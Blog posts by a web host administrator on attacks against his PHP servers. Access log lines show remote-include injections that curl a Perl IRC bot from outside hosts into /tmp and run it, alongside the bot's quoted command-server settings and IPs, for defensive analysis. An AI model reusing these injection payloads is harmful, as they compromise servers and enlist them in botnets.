Update: Of course it was 2.1 and not 3.0

200.182.50.156 - - [26/Dec/2006:04:03:23 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xargonu.evonet.ro/tool25.txt?&cmd=curl%20-o%20/tmp/unix%20http://sclipici.0catch.com/br/scan.txt;perl%20/tmp/unix ? HTTP/1.0" 200 10922 "-" "Mozilla/5.0"

This request reffers to this http://sclipici.0catch.com/br/scan.txt script. When you open that script you see that the new irc server is now 194.109.20.90, all other stuff like channels and nicknames has stayed the same.

255.255.255.256 - - [19/Dec/2006:00:57:53 +0100] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xargonu.evonet.ro/tool25.txt?&cmd=curl%20-o%20/tmp/unix%20http://rebegea.xhost.ro/php/scan.pl;perl%20/tmp/unix
? HTTP/1.0" 200 9905 "-" "Mozilla/5.0"

As you can see I obfuscated the source ip. I downloaded this file referenced in the url. At the top of that script you see this piece of code:

my @adms=("sclipici");	       #
#----------------------------------------------################################################
my @canais=("#sclipici :lametrapchan","#sclipici :lametrapchan");     #
#----------------------------------------------################################################

my $nick='necazu';	                       #
#----------------------------------------------################################################
my $ircname = 'id';                         #
#----------------------------------------------################################################
chop (my $realname = `uname -a`);                   #
#----------------------------------------------################################################
$servidor='217.107.222.15' 		       #
unless $servidor;  			       #
#----------------------------------------------################################################
my $porta='6667';

As you can see it’s not so hard to find the irc server the exploited servers connect back to and the commands that are given. Here the irc server has the ip 217.107.222.15 and port 6667. The right thing to do now would be to warn the abuse contact for that ip. I tried that some time but after a while you give up because you never get any response.

The irc server found in this script isn’t active any more at the moment. But from an other access log entry I got this script. You can extract this ip and port 84.232.78.6:6667 from the script. They expect you to go to the channel #necazul with the nick gabiXXX with XXX some number.

Just drop by some time, I don’t think they like and I enough people do this they will have to move. I someone knows where you can report this stuff without wasting your time because no one will do something about it, please let me know.

The webserver I administer has been under some sort of DDOS attack for some weeks now. At first I noticed something was wrong because the server ran out of workers although the bandwidth and the number of requests per second where normal. After some time I discovered that some hosts tried to post on an old phpBB2 forum I removed a few weeks before. I’ve been running a script for twee weeks that parses the apache extended server status and sees if there is some host that posts to the url. The rate isn’t high but they don’t read the response and keep the tcp connection option so the connection needs to timeout.

At the moment I’m already blocking over 1150 ip’s and they keep trying. I’ve also put the list of blocked ip’s online, maybe someone can do something usefull with it: http://web.ulyssis.org/blocked-ip.txt

Note: I’m lazy by nature so not all changes have kernel version checks, for all kernel up to 2.6.16 the normal version from wischip will do fine and this patch isn’t needed. Don’t say I didn’t warn you!

The project page is here: http://pecl.php.net/package/htscanner/

But it gets better, yesterday they released PHP 5.1.6 with an update for a bugfix in 5.1.5 that didn’t work on 64-bit architectures. It really starts to feel like they do it on purpose. If someone of the PHP release/QA team reads this, you can stop now, it’s not funny anymore. Luckily I don’t have a 64-bit machine that I admin, because otherwise I could start building new packages, again.

Something else, the hardened PHP guys released the successor of their patch-set. All non-essential stuff has been moved to an extension. More information can you find on this page. I haven’t been able to test it or do tests with eAccelerator. Remember, it’s still beta software!

The last release supports the linux kernel up to version 2.6.16 but when running Fedora rawhide all the time this isn’t good enough. So a patch the driver to support 2.6.17 and the current rc’s for 2.6.18. You can get the patch here, only use it when you are using 2.6.17 or 2.6.18 because it doesn’t contain the ifdef’s needed to make it compile on kernel < = 2.6.16

Btw, this is my first post with Drivel and I seem to like it!

Our cheapest account gets you hosting for €7,5 a year. You’ll get 200mb quota, 1 mysql/postgresql db, vhosts, a shell account, 1 mailbox but unlimited forwarders for other email addresses. Svn repositorie(s) that aren’t included in the quota. We have between 300 and 400 accounts. Running a secure webserver for these accounts sucks!

The break-in through a lame php script I wrote about two days ago was on that webserver. I’ve been putting a lot of work in securing the server to make sure that the threath of a poorly written script is reduced to it’s bare minimum. I already wrote about this patch, It’s replaced now by the filter functionality of hardened php and this patch for the mail function. Because there was an error in the mailfunction config (wrong sendmail parameters) mails from five days got bounced to the www-data user. I wrote a script to extract the original messages and sent them anyway.
Looking throug those bounced mails with grep on stuff like ‘enlarge your’, ‘blue pills’ and other keywords you probably know really wel, allowed me to find a forum that they renamed to /forum_old and placed their new on at /forum. It was a phpBB2 install that hadn’t been used for 3 years and was hacked in 2004. It generated a few dozen spam-mails to it’s old users every day. This isn’t just bad for the name of your website (it was a student organisation), it’s also a security threat for the webserver and for the all users.

So I got an idea. Because the number of users and especially the number of vhosts (everyone needs to have at least two domains to be cool these days (;), I started working on migrating all vhosts to a setup that gets it’s vhosts from ldap with mod-vhost-ldap. This got me thinking about a filter for postfix that checks the X-PHP-Script header and searches the user and it’s vhosts in ldap and check it for by piping it through spamassassin. Storing these results in a database should allow me to generate nice reports every day who is sending spam from it’s vhost and identifying the buggy webforms.

If anyone knows about such a filter for postfix or any other mta, please let me know. It really doesn’t need to have the ldap- backend. It it can generate stats on a vhost basis, that’s already more then fine and should be good starting point.

But, yesterday I had to find out the hard way that they also make some big mistakes. A server I manage got hacked through a basic remote include code inject. I was amazed to see something like that happening because I there a one thing this patch should protect php against, it’s something like this. The hPHP include filter protection only worked when you included a file with the path as a constant in your code. When you include it from a variable like $_GET['page'] the protection didn’t happen.

After some searching it seemed that they patch zend_vm_def.h which contains “template” code that allows zend_vm_gen.php to regenerate the vm in PHP 5.1, when you do regenerate the vm you get the full protection. The hPHP patch also adds protection to the pre-generated code that is used when you just compile PHP from source, BUT they only patch the first opcode handler for ‘require’ and ‘include’. The vm has four of them that all differ a bit from each other depending on the argument passed to require.

What I don’t seem to get is why they don’t regenerate the vm and create the patch at that moment instead of patching it manually. Today they released a new version which includes a fix for this problem hphp 0.4.14 Let’s hope there aren’t any of these “suprises” left because I really don’t like them